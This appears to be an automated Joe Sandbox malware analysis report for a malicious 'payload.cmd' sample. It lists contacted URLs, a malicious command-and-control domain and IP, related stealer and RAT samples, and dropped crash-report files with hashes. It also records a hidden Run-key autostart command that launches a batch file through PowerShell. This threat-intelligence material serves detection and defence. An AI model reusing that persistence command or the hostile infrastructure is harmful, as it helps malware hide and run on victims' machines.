        unknown
        NameMaliciousAntivirus DetectionReputation
        https://ipwho.is/false
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CE2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://go.micropowershell.exe, 00000027.00000002.2076913027.000001908E0C4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.microsoft.copowershell.exe, 0000001D.00000002.2617048225.0000025785F60000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://osoft.co_2010-06Xdwm.exe, 0000002D.00000002.2645406461.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000002D.00000000.2095647683.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      https://aka.ms/pscore6powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000027.00000002.2076913027.000001908CE4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2289327264.00000190A511C000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://go.micpowershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                              unknown
                              https://aka.ms/pscore6xGhpowershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmpfalse
                                unknown
                                http://schemas.xmlsoap.org/wsdl/lsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1939727750.000002753CE8B000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2262954013.000001909CC89000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  unknown
                                  http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.53.drfalse
                                    unknown
                                    https://aka.ms/pscore68powershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000002B.00000002.2575652739.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078686359.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      unknown
                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000002B.00000002.2574475204.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002B.00000000.2078598792.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000009.00000002.1690548235.000002752CE01000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2621362180.00000257863A1000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2076913027.000001908CC21000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://go.micom/fwlink/?LinkIpowershell.exe, 0000001D.00000002.2596558815.00000257845F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        154.216.20.132
                                        azure-winsecure.comSeychelles
                                        135357SKHT-ASShenzhenKatherineHengTechnologyInformationCotrue
                                        195.201.57.90
                                        ipwho.isGermany
                                        24940HETZNER-ASDEfalse
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1524983
                                        Start date and time:2024-10-03 14:52:55 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 12m 8s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:44
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:17
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:payload.cmd
                                        Detection:MAL
                                        Classification:mal100.spyw.evad.winCMD@54/88@2/2
                                        EGA Information:
                                        • Successful, ratio: 92.3%
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 71
                                        • Number of non-executed functions: 322
                                        Cookbook Comments:
                                        • Found application associated with file extension: .cmd
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 40.126.31.73, 20.190.159.71, 20.190.159.75, 20.190.159.2, 20.190.159.0, 40.126.31.67, 20.190.159.68, 20.190.159.4, 52.168.117.173, 104.208.16.94, 20.190.159.73, 20.190.159.23, 40.126.31.71, 40.126.31.69
                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, time.windows.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                        • Execution Graph export aborted for target powershell.exe, PID 6324 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtFsControlFile calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: payload.cmd
                                        TimeTypeDescription
                                        08:53:54API Interceptor4x Sleep call for process: WMIC.exe modified
                                        08:53:57API Interceptor39315x Sleep call for process: powershell.exe modified
                                        10:22:53API Interceptor2x Sleep call for process: WerFault.exe modified
                                        10:24:17API Interceptor154x Sleep call for process: lsass.exe modified
                                        10:24:17API Interceptor172x Sleep call for process: winlogon.exe modified
                                        10:24:18API Interceptor145x Sleep call for process: dwm.exe modified
                                        10:24:18API Interceptor1065x Sleep call for process: svchost.exe modified
                                        10:24:28API Interceptor14x Sleep call for process: cmd.exe modified
                                        10:24:28API Interceptor15x Sleep call for process: conhost.exe modified
                                        16:23:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                        16:24:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        154.216.20.132SC.cmdGet hashmaliciousUnknownBrowse
                                          1.cmdGet hashmaliciousUnknownBrowse
                                            2.cmdGet hashmaliciousUnknownBrowse
                                              download_2.exeGet hashmaliciousQuasarBrowse
                                                195.201.57.90SPt4FUjZMt.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, PythonCryptoHijacker, RedLineBrowse
                                                • /?output=json
                                                765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                • /?output=json
                                                765iYbgWn9.exeGet hashmaliciousLuca StealerBrowse
                                                • /?output=json
                                                WfKynArKjH.exeGet hashmaliciousAsyncRAT, Luca Stealer, MicroClip, RedLineBrowse
                                                • /?output=json
                                                ubes6SC7Vd.exeGet hashmaliciousUnknownBrowse
                                                • ipwhois.app/xml/
                                                cOQD62FceM.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                • /?output=json
                                                Clipper.exeGet hashmaliciousUnknownBrowse
                                                • /?output=json
                                                cOQD62FceM.exeGet hashmaliciousLuca StealerBrowse
                                                • /?output=json
                                                Cryptor.exeGet hashmaliciousLuca StealerBrowse
                                                • /?output=json
                                                Cryptor.exeGet hashmaliciousLuca Stealer, Rusty StealerBrowse
                                                • /?output=json
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                azure-winsecure.comSC.cmdGet hashmaliciousUnknownBrowse
                                                • 154.216.20.132
                                                1.cmdGet hashmaliciousUnknownBrowse
                                                • 154.216.20.132
                                                2.cmdGet hashmaliciousUnknownBrowse
                                                • 154.216.20.132
                                                download_2.exeGet hashmaliciousQuasarBrowse
                                                • 154.216.20.132
                                                ipwho.isSC.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                1.cmdGet hashmaliciousUnknownBrowse
                                                • 108.181.98.179
                                                2.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                download_2.exeGet hashmaliciousQuasarBrowse
                                                • 147.135.36.89
                                                MZs41xJfcH.exeGet hashmaliciousPureLog Stealer, Quasar, zgRATBrowse
                                                • 195.201.57.90
                                                N5mRSBWm8P.exeGet hashmaliciousQuasarBrowse
                                                • 195.201.57.90
                                                Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                                • 195.201.57.90
                                                mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                                                • 108.181.98.179
                                                SecuriteInfo.com.BackDoor.QuasarNET.3.14065.23993.exeGet hashmaliciousQuasarBrowse
                                                • 195.201.57.90
                                                http://ufvskbzrquea.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                • 195.201.57.90
                                                bg.microsoft.map.fastly.netSC.cmdGet hashmaliciousUnknownBrowse
                                                • 199.232.210.172
                                                Ton618.exeGet hashmaliciousQuasarBrowse
                                                • 199.232.214.172
                                                Ton618 (2).exeGet hashmaliciousQuasarBrowse
                                                • 199.232.210.172
                                                https://drmerp.com/bWFpbEBrc2xhdy5jby51aw==&xBvSo7gjDRPy&hmr&x-ad-vt-unk&OC305935Get hashmaliciousHTMLPhisherBrowse
                                                • 199.232.214.172
                                                2.cmdGet hashmaliciousUnknownBrowse
                                                • 199.232.210.172
                                                http://arcor.cfdGet hashmaliciousHTMLPhisherBrowse
                                                • 199.232.210.172
                                                veEGy9FijY.exeGet hashmaliciousSmokeLoaderBrowse
                                                • 199.232.210.172
                                                http://investmentmemo.xyzGet hashmaliciousHtmlDropperBrowse
                                                • 199.232.210.172
                                                https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$Get hashmaliciousHtmlDropperBrowse
                                                • 199.232.214.172
                                                mnFHs2DuKg.exeGet hashmaliciousUnknownBrowse
                                                • 199.232.210.172
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                HETZNER-ASDESC.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                2.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 49.12.197.9
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 49.12.197.9
                                                gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                • 116.203.0.21
                                                dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                • 116.203.0.21
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 49.12.197.9
                                                oRdgOQMxjr.exeGet hashmaliciousRedLineBrowse
                                                • 178.63.51.126
                                                https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                • 136.243.216.232
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 49.12.197.9
                                                SKHT-ASShenzhenKatherineHengTechnologyInformationCoSC.cmdGet hashmaliciousUnknownBrowse
                                                • 154.216.20.132
                                                RICHIESTA_OFFERTA_RDO2400423.docx.docGet hashmaliciousGuLoaderBrowse
                                                • 154.216.20.22
                                                1.cmdGet hashmaliciousUnknownBrowse
                                                • 154.216.20.132
                                                2.cmdGet hashmaliciousUnknownBrowse
                                                • 154.216.20.132
                                                download_2.exeGet hashmaliciousQuasarBrowse
                                                • 154.216.20.132
                                                New order02102024.docGet hashmaliciousNanocoreBrowse
                                                • 154.216.20.22
                                                KBGC_1200O000000_98756.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 154.216.20.22
                                                https://akbb.kampanyakrediiislemleri.com/Get hashmaliciousUnknownBrowse
                                                • 154.216.20.140
                                                mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 156.254.70.160
                                                ppc.elfGet hashmaliciousMiraiBrowse
                                                • 156.254.70.191
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eSC.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                • 195.201.57.90
                                                QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                • 195.201.57.90
                                                1.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                2.cmdGet hashmaliciousUnknownBrowse
                                                • 195.201.57.90
                                                download_2.exeGet hashmaliciousQuasarBrowse
                                                • 195.201.57.90
                                                PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                                                • 195.201.57.90
                                                gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                                                • 195.201.57.90
                                                dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                                                • 195.201.57.90
                                                tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                                                • 195.201.57.90
                                                No context
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.509705277121146
                                                Encrypted:false
                                                SSDEEP:192:tBamG5y9d0eLDkja1TyDWRhl4Glg6zuiF9Z24lO8n:btG5ykeLDkjOTJj4kg6zuiF9Y4lO8n
                                                MD5:D21AD234D177ABFA8F6B41E97799A15E
                                                SHA1:67619D7CC4064F6B5CD09E28FF320BD0C796153F
                                                SHA-256:AFA7A737C9D6CB7797D7AFB0E81F0D69289AB02FAA968A9162AABE16290A768A
                                                SHA-512:69A71FEBDF9E2798F874AAD99550161F02E0E0B8DFF3BC4B9F9534E99BD80E0D95400C9DE562503F17EF739985A28E6F635FEA4905677A434B32960E11106F80
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.9.0.1.1.6.3.2.7.8.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.9.0.1.3.2.5.7.8.1.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.f.6.c.3.a.8.-.d.8.4.2.-.4.e.1.b.-.8.1.0.a.-.f.d.4.9.d.4.7.7.6.7.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.2.6.b.c.0.5.b.-.5.b.6.f.-.4.0.5.0.-.b.b.7.9.-.c.4.9.8.e.2.0.9.0.d.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.0.-.0.0.0.1.-.0.0.1.4.-.d.8.0.4.-.3.2.c.f.9.f.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.5097629431757393
                                                Encrypted:false
                                                SSDEEP:192:zp2mGwy9d0eLDkjaNTyUa8pBl5lg6zuiFqZ24lO8n:95GwykeLDkjGTnpDLg6zuiFqY4lO8n
                                                MD5:1D0934945059F61EE61C311173090F96
                                                SHA1:4F1574DB5C3090344E8FDD3DBF9E30BFDA7DFAC1
                                                SHA-256:9F364BBD6583786239B9863DA3836EB86B2FB2EAF6A4D812B5A4CFEFD8C7C59B
                                                SHA-512:2166B7A53737E8B7F80D4AEDEFA44F2A1FF21873D0A22978299DF79994E36BC7DD07B9DD4FBD4CFCC29DC450CF5D07A57B20B7A8D10E26643EB166FF06BA4B77
                                                Malicious:false
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.6.4.4.1.7.0.8.6.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.6.4.5.0.3.0.2.3.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.2.c.7.1.c.6.d.-.8.9.0.6.-.4.4.0.a.-.a.6.d.6.-.1.1.1.3.2.9.2.0.5.9.f.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.4.4.7.3.8.7.-.2.1.5.5.-.4.8.d.1.-.b.f.0.a.-.0.d.9.f.1.7.3.0.3.0.1.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.1.0.-.0.0.0.1.-.0.0.1.4.-.2.f.f.b.-.c.9.4.e.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:54:04 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):891641
                                                Entropy (8bit):3.530611607065083
                                                Encrypted:false
                                                SSDEEP:6144:LlV14seL197h4lSWPUmmvnZuAFgqCucSqnCcjJ3QX7Qi4:VY97yEWPUmmvnZ3FgbSqn7j9QX7Qi
                                                MD5:12BB952D99CBD7AC964E6D4E63C7E942
                                                SHA1:4E2DFA844C21810ACE843C50AE5A7492701428CE
                                                SHA-256:3171422903E0AAF7E045EFBB6F845092600B3C26ADA0FBE056C64676ABF0B45E
                                                SHA-512:70E16378D06A72ABF7C2DD6A7664C0638869B0B66DEAC9DBA957ED2996FC57F08D85630E2A5B475B7EDA96A2E42FA80634A560CE6B885413E871B2774893090B
                                                Malicious:false
                                                Preview:MDMP..a..... .........f.........................'...........5...2......t...D...........`.......8...........T............]...=..........Xh..........Dj..............................................................................eJ.......j......Lw......................T.............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8780
                                                Entropy (8bit):3.6957571508543463
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJwp86Y7vf3gmfZaPKpWER89baNtf04+m:R6lXJm86YTvgmfQPtaXfB
                                                MD5:32972E2E22E9501E7C0ED9556C311B9C
                                                SHA1:6D6133784701EF2FCDA6AFA3B4C5A00A9250501F
                                                SHA-256:A7ADF895110A4FC3689A290465C5659541DBB7CEB5C199A36EB6D9E762DF80BF
                                                SHA-512:C084A024687DB656A3A02623AAB02A8C4C29D0D725065FB3D1BBD52834289FECD2FDC220D1999743D802F89CDD53C7C46C1F95D2232C0B80C93D6853644157FF
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.6.4.<./.P.i.
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4777
                                                Entropy (8bit):4.441955789917749
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zseXgJg771I9fMWpW8VYUJYm8M4JQ9wSFxEyq8vlwoeytf6d:uIjfbI7El7VqJQGYEWuoeuf6d
                                                MD5:20D8A6E4BAF3B3C2266739CC995132F8
                                                SHA1:26CAE27DA0F405D23473617198A44F96268F7613
                                                SHA-256:94ADBEAD629757FC04AEE04ED92B49EAD414769CF822D332C632FD8CD238FE6B
                                                SHA-512:4ABCECD538CD261B3CDD5724B384A189372F40207BBA3C75500C03C9E0CDD7FA98C8D1BF2CBDC88A82B9F34A09E8A5F533A980D591ECF21A7CBB6112574AE8FD
                                                Malicious:false
